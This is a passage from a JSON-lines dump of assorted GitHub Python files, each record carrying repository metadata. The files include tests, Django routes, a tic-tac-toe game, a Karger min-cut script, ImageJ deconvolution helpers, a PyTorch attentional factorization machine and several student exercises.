simulator","repo_name":"cyphyhouse/Aircraft_Landing_Verification","sub_path":"landing_devel/aircraft_simulator.py","file_name":"aircraft_simulator.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25442491730","text":"import dataclasses\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport lobotomy\nfrom pytest import mark\n\nfrom manager import _runner\nfrom manager import _types\nfrom manager.tests import _utils\n\nCAPACITY_SCENARIOS = (\n {\"desired\": 4, \"fleet\": 2, \"node\": 2},\n {\"desired\": 0, \"fleet\": 0, \"node\": 0},\n {\"desired\": 0, \"fleet\": 0, \"node\": 2},\n {\"desired\": 0, \"fleet\": 2, \"node\": 0},\n {\"desired\": 2, \"fleet\": 1, \"node\": 3},\n)\n\n\n@mark.parametrize(\"scenario\", CAPACITY_SCENARIOS)\n@lobotomy.patch()\n@patch(\"manager._expander.grow_fleet\")\n@patch(\"manager._contractor.shrink_fleet\")\n@patch(\"manager._controller.get_nodes\")\n@patch(\"manager._controller.get_fleet\")\ndef test_update_fleet(\n get_fleet: MagicMock,\n get_nodes: MagicMock,\n shrink_fleet: MagicMock,\n grow_fleet: MagicMock,\n lobotomized: lobotomy.Lobotomy,\n scenario: dict,\n):\n \"\"\"Should update the fleet by calling the shrink and grow functions.\"\"\"\n configs = _types.ManagerConfigs()\n configs.fleets.append(\n _types.FleetRequirements(\n configs=configs,\n sector=\"primary\",\n size_spec=_types.SMALL_MEMORY_SPEC,\n )\n )\n\n get_fleet.return_value = _utils.make_fleet(\n requirements=configs.fleets[0],\n capacity=scenario[\"fleet\"],\n )\n\n node = _utils.make_fleet_node(\"a\", configs.fleets[0])\n indexes = list(range(scenario[\"node\"]))\n get_nodes.return_value = {\n **{f\"a{i}\": node for i in indexes},\n # These nodes should be filtered out because they don't meet the\n # criteria for inclusion in the fleet capacity calculation.\n **{f\"b{i}\": dataclasses.replace(node, state=\"foo\") for i in indexes},\n **{\n f\"c{i}\": dataclasses.replace(node, requirements=configs.fleets[0])\n for i in indexes\n },\n }\n\n _runner._update_fleet(\n configs=configs,\n fleet_requirements=configs.fleets[0],\n desired_capacity=scenario[\"desired\"],\n )\n","repo_name":"rocketboosters/kluster-fleet-manager","sub_path":"manager/tests/_manager/test_update_fleet.py","file_name":"test_update_fleet.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8837858694","text":"from scipy.stats import pearsonr\nimport matplotlib.pyplot as plt\n\n\nfig_2d = plt.figure()\nax = fig_2d.add_subplot(131)\n\nx = [10, 50, 30, 70, 80, 60, 90, 40, 10, 20, 30, 50, 60]\ny = [4, 5, 2, 6, 6, 8, 7, 2, 7, 3, 5, 1, 3]\n\nax.scatter(x, y, c='g', marker='o')\n\nax.set_xlabel('Zeitdauer X (in Minuten)')\nax.set_ylabel('Aggressivitätsmaß Y')\n\nr_xy, _ = pearsonr(x, y)\nprint('Korrelationskoeffizienten: %.3f\\n' % r_xy)\n\nx_boys = [x[idx] for idx in range(7)]\ny_boys = [y[idx] for idx in range(7)]\n\nax_boys = fig_2d.add_subplot(132)\nax_boys.scatter(x_boys, y_boys, c='b', marker='o')\n\nax_boys.set_xlabel('Zeitdauer X (in Minuten)')\nax_boys.set_ylabel('Aggressivitätsmaß Y')\nax_boys.set_title('Jungen')\n\nr_xy_boys, _ = pearsonr(x_boys, y_boys)\nprint('Korrelationskoeffizienten Jungen: %.3f\\n' % r_xy_boys)\n\nx_girls = [x[idx] for idx in range(7, 13)]\ny_girls = [y[idx] for idx in range(7, 13)]\n\nax_girls = fig_2d.add_subplot(133)\nax_girls.scatter(x_girls, y_girls, c='r', marker='o')\n\nax_girls.set_xlabel('Zeitdauer X (in Minuten)')\nax_girls.set_ylabel('Aggressivitätsmaß Y')\nax_girls.set_title('Mädchen')\n\nr_xy_girls, _ = pearsonr(x_girls, y_girls)\nprint('Korrelationskoeffizienten Mädchen: %.3f\\n' % r_xy_girls)\n\nplt.show()\n","repo_name":"vladb99/htwg","sub_path":"S2/STO/Python/aufgabe19.py","file_name":"aufgabe19.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23763011750","text":"from restclients_core.exceptions import DataFailureException\nfrom uw_kws.dao import KWS_DAO\nfrom uw_kws.models import Key\nimport json\n\nENCRYPTION_KEY_URL = \"/key/v1/encryption/{}.json\"\nENCRYPTION_CURRENT_KEY_URL = \"/key/v1/type/{}/encryption/current.json\"\n\n\nclass KWS(object):\n \"\"\"\n The KWS object has methods for getting key information.\n \"\"\"\n def _get_resource(self, url, headers={}):\n headers[\"Accept\"] = \"application/json\"\n\n response = KWS_DAO().getURL(url, headers)\n\n if response.status != 200:\n raise DataFailureException(url, response.status, response.data)\n\n return json.loads(response.data)\n\n def get_key(self, key_id=None, url=None):\n \"\"\"\n Returns a restclients.Key object for the given key ID or URL. If the\n key isn't found, or if there is an error communicating with the\n KWS, a DataFailureException will be thrown.\n \"\"\"\n if key_id is not None:\n url = ENCRYPTION_KEY_URL.format(key_id)\n elif url is None:\n raise TypeError('URL is None')\n return Key.from_json(self._get_resource(url))\n\n def get_current_key(self, resource_name):\n \"\"\"\n Returns a restclients.Key object for the given resource. If the\n resource isn't found, or if there is an error communicating with the\n KWS, a DataFailureException will be thrown.\n \"\"\"\n url = ENCRYPTION_CURRENT_KEY_URL.format(resource_name)\n return Key.from_json(self._get_resource(url))\n","repo_name":"uw-it-aca/uw-restclients-kws","sub_path":"uw_kws/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71479752107","text":"from django.test import TestCase\nfrom .models import PeriodData\n\n# Create your tests here.\nclass ModelTest(TestCase):\n\n def test_create_cycle(self):\n period_data = PeriodData.objects.create(\n last_period = \"2020-06-20\",\n cycle_average = 25,\n period_average = 5,\n start_date = \"2020-07-25\",\n end_date = \"2021-07-25\"\n )\n period_data.save()\n\n self.assertEqual(str(period_data.last_period), \"2020-06-20\")\n\n\n","repo_name":"gerald-x/womans-period","sub_path":"periodapi/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14434333686","text":"def number_of_symb_in_line():\n with open('referat.txt', 'r', encoding='utf-8') as r:\n i = 0\n for str in r:\n i += 1\n str = str.replace(\"\\n\", \"\")\n print(\"Количество символов в {} строке: \".format(i), len(str))\n\n\ndef number_of_symb_in_text():\n with open('referat.txt', 'r', encoding='utf-8') as r:\n content = r.read().replace(\"\\n\", \"\")\n print(\"Количество символо всего текста: \", len(content))\n\n\ndef number_of_words_in_text():\n with open('referat.txt', 'r', encoding='utf-8') as r:\n content = r.read().replace(\"\\n\", \"\").split()\n print(\"Количество слов в тексте: \", len(content))\n\n\ndef create_new_file():\n with open('referat.txt', 'r', encoding='utf-8') as r:\n content = r.read().replace(\".\", \"!\")\n\n with open('referat2.txt', 'w', encoding='utf-8') as w:\n w.write(content)\n print(\"Создан новый файл referat2.txt, где вместо запятых стоит воскл.знак\")\n\n\nnumber_of_symb_in_line()\nnumber_of_symb_in_text()\nnumber_of_words_in_text()\ncreate_new_file()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Vlad-Bryu/Home_work","sub_path":"learn3/files1task.py","file_name":"files1task.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21133200343","text":"\r\ndef writeFile():\r\n inputNama = input(\"Masukkan Nama mu: \")\r\n inputUmur = input(\"Masukkan Umur mu: \")\r\n inputAlamat = input(\"Masukkan Alamatmu: \")\r\n inputEmail = input(\"Masukkan Emailmu: \")\r\n inputDosen = input(\"Masukkan Dosen Walimu: \")\r\n \r\n fileWrite = open(\"Biodata.txt\", \"w\")\r\n fileWrite.write(\"Nama: \" + inputNama + \"\\nUmur: \" + inputUmur + \"\\nAlamat: \" + inputAlamat + \"\\nEmail: \" + inputEmail + \"\\nDosen Wali: \" + inputDosen)\r\n fileWrite.close()\r\n\r\ndef readFile():\r\n fileRead = open(\"Biodata.txt\", \"r\")\r\n text = fileRead.read()\r\n print(\"Berikut Ini Data Kamu\")\r\n print(text)\r\n fileRead.close()\r\n\r\nwriteFile()\r\nprint(\"\\n\")\r\nreadFile()","repo_name":"Virester/modul-9","sub_path":"Modul 9 - Latihan 1.py","file_name":"Modul 9 - Latihan 1.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19911111820","text":"print('*' * 10, \" Крестики-нолики v.1.0\", '*' * 10)\n\nboard = list(range(1, 10))\n\n\ndef draw_board(board): # создаем функцию для игрового поля\n print('-' * 13)\n for i in range(3):\n print('|', board[0 + i * 3], '|', board[1 + i * 3], '|', board[2 + i * 3], '|') # создаем 9 ячеек для игры\n print('-' * 13)\n\n\ndef take_input(player_token): # функция принимает ввод пользоваетля\n valid = False\n while not valid:\n player_answer = input(\"Куда поставим:\" + player_token + \"?\")\n try:\n player_answer = int(player_answer)\n except:\n print(\"Некорректный ввод. Вы уверены, что ввели число?\")\n continue\n if player_answer >= 1 and player_answer <= 9:\n if str(board[\n player_answer - 1]) not in \"X0\": # Проверка когда клетка занята или введино число не из диапазона от 1 до 9\n board[player_answer - 1] = player_token\n valid = True\n else:\n print(\"Эта клетка уже занята\")\n else:\n print(\"Введите число то 1 до 9\")\n\n\ndef check_win(board): # функция проверяет выиграл ли игрок\n win_cord = ((0, 1, 2), (3, 4, 5), (6, 7, 8), (0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8),\n (2, 4, 6)) # зоздаем кортеж с выиграшными вариантами\n for e in win_cord:\n if board[e[0]] == board[e[1]] == board[e[2]]:\n return board[e[0]]\n return False\n\n\ndef main(board): # собираем все вместе\n counter = 0\n win = False\n while not win:\n draw_board(board)\n if counter % 2 == 0:\n take_input(\"X\")\n else:\n take_input(\"0\")\n counter += 1\n if counter > 4:\n tmp = check_win(board)\n if tmp:\n print(tmp, \"Ты выиграл!\")\n win = True\n break\n if counter == 9:\n print(\"Ничья\")\n break\n draw_board(board)\n\n\nmain(board)\n","repo_name":"maximbabaiev/Education-at-IT-STEP-Academy","sub_path":"ItBasic/06_Module/19_Lesson/Homework/крестики нолики.py","file_name":"крестики нолики.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72983412908","text":"import copy\nimport random\nimport numpy as np\nfrom tqdm import tqdm\n\ndef karger(graph):\n \"\"\"\n randomized contraction algorithm for the min cut problem\n \"\"\"\n while len(graph) > 2:\n i = random.choice(list(graph.keys()))\n j = random.choice(graph[i])\n graph = contract(graph, i, j)\n return len(graph[i])\n\ndef contract(graph, i, j):\n \"\"\"\n contract 2 nodes\n \"\"\"\n neighbors = graph.pop(j)\n graph[i] += neighbors\n for k in graph:\n for l in range(len(graph[k])):\n if graph[k][l] == j:\n graph[k][l] = i\n graph[i] = list(filter(lambda x: x != i, graph[i]))\n return graph\n\n# load txt as graph\ngraph = {}\nwith open('./kargerMinCut.txt', 'r') as f:\n for line in f:\n temp = [int(i) for i in line.split()]\n # add adjacent list\n graph[temp[0]] = temp[1:]\n\n# run many times\nn = len(graph)\niters = 800\nmin = n ** 2\nprint('Begin {} times running...'.format(iters))\ntbar = tqdm(range(iters), ascii=True)\nfor _ in tbar:\n cuts = karger(copy.deepcopy(graph))\n if cuts < min:\n min = cuts\n tbar.set_description(\"Current Min Cut {}\".format(min))\n\nprint('Done!')\nprint('Mincut is', min)\n","repo_name":"LucasBoTang/Coursera_Algorithms","sub_path":"01Divide_and_Conquer_Sorting_and_Searching_and_Randomized_Algorithms/Assignment04/karger_min_cut.py","file_name":"karger_min_cut.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30129176418","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"wiki/edit_entry\", views.edit_entry, name= \"edit_entry\"),\n path(\"wiki/new_entry\", views.new_entry, name= \"new_entry\"),\n path(\"wiki/search_results\", views.search_results, name=\"search_results\"),\n path(\"wiki/random_entry\", views.random_entry, name= \"random_entry\"),\n path(\"wiki/\", views.entery, name= \"entery\"),\n]\n","repo_name":"mograby3500/wiki","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22837584336","text":"# ImageJ tools: ijt\n\nimport scyjava as sj\nfrom functools import lru_cache\n\n\nclass ImageProcess:\n \"\"\"For image processing functions. Note this class\n only supports ImgLib2 images.\n \"\"\"\n\n def __init__(self, ij_instance=None):\n self.ij = ij_instance\n\n def gauss_sub(self, image: \"net.imglib2.RandomAccessibleInterval\", sigma):\n \"\"\"Apply a guassian blur subtraction.\n \"\"\"\n\n self._check_ij_gateway()\n img = self.ij.op().convert().int32(image)\n img_g = self.ij.op().filter().gauss(img, sigma)\n return img_g - img\n\n def gauss_sub_stack(self, stack, sigma: float):\n stack = self.ij.op().convert().int32(stack)\n gauss_slices = []\n for i in range(stack.shape[2]):\n s = self.ij.py.to_dataset(stack[:, :, i])\n s_g = self.ij.op().filter().gauss(s, sigma)\n s_gs = s - s_g\n gauss_slices.append(s_gs)\n return _Views().stack(*gauss_slices)\n\n def invert(self, image: \"net.imglib2.RandomAccessibleInterval\"):\n if self.ij == None:\n self._get_imagej_gateway()\n\n image_i = self.ij.dataset().create(image)\n self.ij.op().run(\"image.invert\", image_i, image)\n return image_i\n\n def _check_ij_gateway(self):\n if self.ij == None:\n self._get_imagej_gateway()\n\n def _get_imagej_gateway(self):\n try:\n from imagej import ij\n\n self.ij = ij\n except ImportError:\n print(f\"PyImageJ has not been initialized.\")\n\n\nclass Deconvolution:\n \"\"\"Deconvolve an image with ImageJ Ops implementation of Richardson Lucy.\n\n :param iterations: Number of iterations (defualt=30)\n :param numerical_aperture: Numerical aperture of the objective used (default=0.75)\n :param wavelength: Wavelength in nm used in the image (default=550)\n :param particle_pos: Position of the particle (positive value in nm) relative to the coverlsip (0)\n \"\"\"\n\n def __init__(\n self,\n iterations=30,\n numerical_aperture=0.75,\n wavelength=550,\n lateral_res=100,\n axial_res=100,\n particle_pos=2000,\n reg_factor=0.01,\n ri_immersion=1.5,\n ri_sample=1.4,\n psf=None,\n ij_instance=None,\n ):\n self.iterations = iterations\n self.numerical_aperture = numerical_aperture\n self.wavelength = wavelength * 1e-9\n self.lateral_res = lateral_res * 1e-9\n self.axial_res = axial_res * 1e-9\n self.particle_pos = particle_pos * 1e-9\n self.reg_factor = reg_factor\n self.ri_immersion = ri_immersion\n self.ri_sample = ri_sample\n self.ij = ij_instance\n self.psf = psf\n\n def get_config(self):\n \"\"\"Return the current configuration for deconvolution\"\"\"\n print(\"\\nDeconvolution configuration\")\n print(f\"\\tIterations: {self.iterations}\")\n print(f\"\\tNumerical Aperture: {self.numerical_aperture}\")\n print(f\"\\tWavelength: {self.wavelength / 1e-9} nm\")\n print(f\"\\tLateral resolution: {self.lateral_res / 1e-9} nm\")\n print(f\"\\tAxial resolution: {self.axial_res / 1e-9} nm\")\n print(f\"\\tParticle position: {round(self.particle_pos / 1e-9)} nm\")\n print(f\"\\tRi Immersion: {self.ri_immersion}\")\n print(f\"\\tRi Sample: {self.ri_sample}\")\n print(f\"\\tReg factor: {self.reg_factor}\")\n if self.psf == None:\n print(f\"\\tPSF: synthetic (default)\\n\")\n else:\n print(f\"{self.psf}\\n\")\n\n\n def get_iterations(self):\n return self.iterations\n\n def set_iterations(self, iterations):\n self.iterations = iterations\n\n def get_numerical_aperture(self):\n return self.numerical_aperture\n\n def set_numerical_aperture(self, numerical_aperture):\n self.numerical_aperture = numerical_aperture\n\n def get_wavelength(self):\n return self.wavelength\n\n def set_wavelength(self, wavelength):\n self.get_wavelength = wavelength * 1e-9\n\n def get_lateral_res(self):\n return self.lateral_res\n\n def set_lateral_res(self, lateral_res):\n self.lateral_res = lateral_res * 1e-9\n\n def get_axial_res(self):\n return self.axial_res\n\n def set_axial_res(self, axial_res):\n self.axial_res = axial_res * 1e-9\n\n def get_particle_pos(self):\n return self.particle_pos\n\n def set_particle_pos(self, particle_pos):\n self.particle_pos = particle_pos * 1e-9\n\n def get_ri_immersion(self):\n return self.ri_immersion\n\n def set_ri_immersion(self, ri_immersion):\n self.ri_immersion = ri_immersion\n\n def get_ri_sample(self):\n return self.ri_sample\n\n def set_ri_sample(self, ri_sample):\n self.ri_sample = ri_sample\n\n def get_reg_factor(self):\n return self.reg_factor\n\n def set_reg_factor(self, reg_factor):\n self.reg_factor = reg_factor\n\n def get_psf(self):\n return self.psf\n\n def set_psf(self, psf):\n self.psf = psf\n\n def deconvolve(self, image: \"net.imglib2.RandomAccessibleInterval\", psf=None):\n \"\"\"Deconvolve images\"\"\"\n if self.ij == None:\n self._get_imagej_gateway()\n\n # convert image to float\n image_f = self.ij.op().convert().float32(image)\n\n # create synthetic PSF if none supplied.\n if self.psf == None:\n self.create_synthetic_psf(image)\n\n # deconvolve image\n image_decon = self.ij.op().namespace(_CreateNamespace()).img(image_f)\n self.ij.op().deconvolve().richardsonLucyTV(\n image_decon, image_f, self.psf, self.iterations, self.reg_factor\n )\n\n return image_decon\n\n def create_synthetic_psf(self, image: \"net.imglib2.RandomAccessibleInterval\"):\n \"\"\"Create a synthetic PSF.\"\"\"\n if self.ij == None:\n self._get_imagej_gateway()\n\n psf_dims = []\n for i in range(len(image.shape)):\n psf_dims.append(image.dimension(i))\n\n psf_size = _FinalDimensions()(psf_dims)\n psf = (\n self.ij.op()\n .namespace(_CreateNamespace())\n .kernelDiffraction(\n psf_size,\n self.numerical_aperture,\n self.wavelength,\n self.ri_sample,\n self.ri_immersion,\n self.lateral_res,\n self.axial_res,\n self.particle_pos,\n _FloatType()(),\n )\n )\n\n self.psf = psf\n\n def _get_imagej_gateway(self):\n try:\n from imagej import ij\n\n self.ij = ij\n except ImportError:\n print(f\"PyImageJ has not been initialized.\")\n\n\ndef image_conversion_check(imagej_instance):\n \"\"\"\n Test ImageJ/ImgLib2 image conversions.\n \"\"\"\n # get image classes\n ImagePlus = sj.jimport(\"ij.ImagePlus\")\n Dataset = sj.jimport(\"net.imagej.Dataset\")\n ImgPlus = sj.jimport(\"net.imagej.ImgPlus\")\n Img = sj.jimport(\"net.imglib2.img.Img\")\n RandomAccessibleInterval = sj.jimport(\"net.imglib2.RandomAccessibleInterval\")\n\n # perform conversion checks\n image_classes = [Dataset, ImagePlus, ImgPlus, Img, RandomAccessibleInterval]\n for i in range(len(image_classes)):\n src_class = image_classes[i]\n dest_classes = image_classes.copy()\n dest_classes.remove(src_class)\n for j in range(len(dest_classes)):\n print(\n f\"{src_class} [--->] {dest_classes[j]}: {imagej_instance.convert().supports(src_class, dest_classes[j])}\"\n )\n\n\n@lru_cache\ndef _CreateNamespace():\n return sj.jimport(\"net.imagej.ops.create.CreateNamespace\")\n\n\n@lru_cache\ndef _FinalDimensions():\n return sj.jimport(\"net.imglib2.FinalDimensions\")\n\n\n@lru_cache\ndef _FloatType():\n return sj.jimport(\"net.imglib2.type.numeric.real.FloatType\")\n\n@lru_cache\ndef _Views():\n return sj.jimport(\"net.imglib2.view.Views\")\n","repo_name":"elevans/tooled","sub_path":"src/tooled/ijt.py","file_name":"ijt.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18460136742","text":"import pygame\nimport os\nimport random\n\nclass Fireball(pygame.sprite.Sprite):\n def __init__(self, x, y, right):\n super(Fireball, self).__init__()\n self.x : int = x\n self.y : int = y\n self.right : bool = right\n self.lateral_speed : int = 8\n self.width : int = 40\n self.height : int = 30\n \n \n self.image = pygame.image.load(\"./dragon/fireball/Fire_Attack4.png\")\n if not self.right:\n self.image = pygame.transform.flip(self.image, True, False)\n \n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n\n def move(self) -> None:\n if self.right:\n self.x += self.lateral_speed\n else:\n self.x -= self.lateral_speed\n \n def coordinates(self) :\n if not self.right:\n return self.x + 15, self.y, 30, self.height\n return self.x, self.y, 30, self.height\n \n def update(self):\n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n","repo_name":"DrakeCullen/AdvPy-dpcullen","sub_path":"dragon_slayer/fireball.py","file_name":"fireball.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73823244907","text":"from itertools import permutations\n\n# 소수 판별 함수\ndef is_prime(num):\n if num < 2:\n return False\n for i in range(2, int(num**0.5) + 1):\n if num % i == 0:\n return False\n return True\n\ndef solution(numbers):\n answer = 0\n all_combinations = set()\n\n # 가능한 모든 숫자 조합 생성\n for i in range(1, len(numbers) + 1):\n permutations_list = permutations(numbers, i)\n for perm in permutations_list:\n num = int(\"\".join(perm))\n all_combinations.add(num)\n\n # 각 숫자 조합이 소수인지 확인\n for num in all_combinations:\n if is_prime(num):\n answer += 1\n\n return answer","repo_name":"gns0314/codestudy","sub_path":"프로그래머스/lv2/42839. 소수 찾기/소수 찾기.py","file_name":"소수 찾기.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3030961169","text":"import redis\nimport requests\nimport json\n\ndb = 'localhost'\ndb_port = 6379\n\n\ndef voice_name_edit(channel_id, name) :\n r = redis.Redis(host=db, port=db_port, db=2)\n r.set(channel_id, name)\n\n\nurl = \"https://vsza.hu/hacksense/status.json\"\nheaders = {\"User-Agent\": \"aRandomUserAgenttoMakeTheApiHappy\"}\nresponse = requests.get(url, headers=headers)\ndata = json.loads(response.content.decode('utf-8'))\n\ncache = redis.Redis(host=db, port=db_port, db=3)\n\n\nif (str(data['what']) != cache.get(\"hacksense\").decode('utf-8')):\n state = str(data['what'])\n cache.set('hacksense', state )\n if data['what'] == True:\n voice_name_edit('998622942957150301','space-is-OPEN')\n else:\n voice_name_edit('998622942957150301','space-is-CLOSED')\n\n\n\n# the channel edids pulled from db, by crow bot\n#@tasks.loop(seconds=30)\n#async def edit_vchannel_name():\n# r = redis.Redis(host=db, port=db_port, db=2)\n# for key in r.keys('*'):\n# cahnnel_id = key.decode(\"utf-8\")\n# channel = client.get_channel(int(cahnnel_id))\n# await discord.VoiceChannel.edit(channel, name = r.getdel(key).decode(\"utf-8\"))","repo_name":"GeriTheFox/HSBP-hacksense_Discords_status","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9967026640","text":"\"\"\"\n1903. Largest Odd Number in String\nYou are given a string num, representing a large integer.\nReturn the largest-valued odd integer (as a string)\nthat is a non-empty substring of num,\nor an empty string \"\" if no odd integer exists.\nA substring is a contiguous sequence of characters within a string.\nExample 1:\nInput: num = \"52\"\nOutput: \"5\"\nExplanation: The only non-empty substrings are \"5\", \"2\", and \"52\". \"5\" is the only odd number.\nExample 2:\nInput: num = \"4206\"\nOutput: \"\"\nExplanation: There are no odd numbers in \"4206\".\nExample 3:\nInput: num = \"35427\"\nOutput: \"35427\"\nExplanation: \"35427\" is already an odd number.\n\n\"\"\"\n\nclass Solution:\n def largestOddNumber(self, num: str) -> str:\n num1=int(num)\n if num1%2!=0:\n print(num)\n else:\n lst=[]\n res=\"\"\n for i1 in num:\n lst.append(int(i1))\n lst1=[]\n for i in lst:\n if i%2!=0:\n lst1.append(i)\n if len(lst1)>=1:\n str1_max=max(lst1)\n str1=str(str1_max)\n print(str1)\n else:\n print(\"\")\n \n\n\n\n\n\n# num = \"52\"\nnum = \"4206\"\n# num = \"35427\"\ns1=Solution()\ns1.largestOddNumber(num)","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_21_jan_2022/leetcode_1903_Largest_Odd_Number_in_String.py","file_name":"leetcode_1903_Largest_Odd_Number_in_String.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73695729388","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('GET', views.getData),\n path('POST', views.postData),\n\n # 로그인\n path('login', views.api_login_view),\n # 로그인 확인\n path('login_result', views.api_login_result),\n\n # 맵 등록\n path('map_create', views.api_map_create),\n\n # 맵 조회\n path('map_select', views.api_map_select),\n\n # 프로 파일 데이터 저장\n path('profile', views.api_profile_result),\n\n # 경고 프로파일 데이터\n path('warning_profile', views.api_warning_profile_result),\n]\n","repo_name":"eungyukm/DjangoAzure","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"22668044562","text":"import math\n\nimport torch\nimport torch.nn as nn\n\nfrom helper import *\n\n\nclass AFM(nn.Module):\n def __init__(self, field_size, feat_sizes, embedding_size=4, task='binary'):\n super(AFM, self).__init__()\n self.task = task\n self.field_size = field_size\n self.feature_sizes = feat_sizes\n self.embedding_size = embedding_size\n self.A = field_size * (field_size - 1) // 2\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n stdv = math.sqrt(1 / len(self.feature_sizes))\n self.bias = nn.Parameter(torch.randn(1), requires_grad=True)\n self.fm_first = nn.Embedding(sum(feat_sizes), 1)\n self.fm_first.weight.data.normal_(0, std=stdv)\n self.fm_second = nn.Embedding(sum(feat_sizes), embedding_size)\n self.W = nn.Linear(self.embedding_size, self.A)\n self.b = nn.Parameter(torch.randn(self.A), requires_grad=True)\n self.h = nn.Linear(self.A, 1)\n self.p = nn.Linear(self.embedding_size, 1)\n\n def forward(self, x):\n '''\n\n :param x: batch_size*field_size\n :return:\n '''\n batch_size = x.shape[0]\n fm_first = self.fm_first(x).squeeze(2)\n fm_second = self.fm_second(x) # batch_size*field_size*embedding_size\n # v_list=[]\n rows, cols = [], []\n for i in range(self.field_size):\n for j in range(i + 1, self.field_size):\n rows.append(i)\n cols.append(j)\n # x2=fm_second[:,i,:]*fm_second[:,j,:]#batch_size*embedding_size\n # v_list.append(x2)\n v = fm_second[:, rows, :] * fm_second[:, cols, :]\n # v=torch.cat(v_list,dim=0).view(batch_size,self.A,-1)# batch_size*A*embedding_size\n weights = self.h(torch.relu(self.W(v) + self.b)).squeeze(2) # batch_size*A\n weights = weights.softmax(dim=1) # batch_size*A\n atm = torch.bmm(weights.unsqueeze(1), v).squeeze(1)\n atm = self.p(atm).view(batch_size)\n total_sum = torch.sum(fm_first, 1) + atm + self.bias\n if self.task == 'binary':\n total_sum = torch.sigmoid(total_sum)\n return total_sum\n\n\nif __name__ == '__main__':\n x = torch.randint(1, 4, (3000, 8))\n x, field_size, feature_sizes = find_deep_params(x)\n x = torch.Tensor(x).long()\n y = torch.randint(0, 1, (3000,)).float()\n # print(y[:40])\n atm = AFM(field_size=field_size, feat_sizes=feature_sizes)\n train(atm, x, y, num_epoch=200, lr=3e-2)\n print(atm(x)[:10])\n print(y[:10])\n","repo_name":"Xiaoctw/PYTORCH","sub_path":"ATM.py","file_name":"ATM.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26234812234","text":"def data_type(s):\n\ts_type = type(s)\n\tif s_type == str:\n\t\treturn len(s)\n\n\telif s_type ==bool:\n\t\treturn s\n\n\telif s_type ==int:\n\t\tif s == 100:\n\t\t\treturn 'equal to 100'\n\t\telif s < 100:\n\t\t\treturn 'less than 100'\n\n\t\telse:\n\t\t\treturn 'more than 100'\n\n\telif s_type == list:\n\t\ttry:\n\t\t\tif s[2]:\n\t\t\t\treturn s[2]\n\t\texcept Exception as e:\n\t\t\treturn None\n\telse:\n\t\treturn 'no value'","repo_name":"inchwara/HomeDay1","sub_path":"Data Types Lab.py","file_name":"Data Types Lab.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30819470701","text":"# given 3 sequences of numbers, A, B, C, determine if their intersection is empty. Namely, there does not exist an element x such that\n# x is in A, B, and C\n# Assume no individual sequence contains duplicates\n\nimport numpy as np\n\ndef return_smallest_to_largest(A,B,C):\n list_of_lists = [A,B,C]\n len_list = [len(A), len(B), len(C)]\n fin_list = [0]*3\n for i in range(len(len_list)):\n idx = np.argmin(len_list)\n fin_list[i] = list_of_lists[idx]\n len_list = len_list[0:idx] + len_list[idx+1:]\n list_of_lists = list_of_lists[0:idx] + list_of_lists[idx+1:]\n return fin_list\n\ndef set_disjoint1(A,B,C):\n smtlrg = return_smallest_to_largest(A,B,C)\n for a in smtlrg[0]:\n for b in smtlrg[1]:\n if a == b:\n # we only check an intersection with c if a, and b intersect\n for c in smtlrg[2]:\n if a == c:\n return [False, a]\n return [True, '']\n\n\ndef main():\n A = input('Enter sequence A: ')\n B = input('Enter 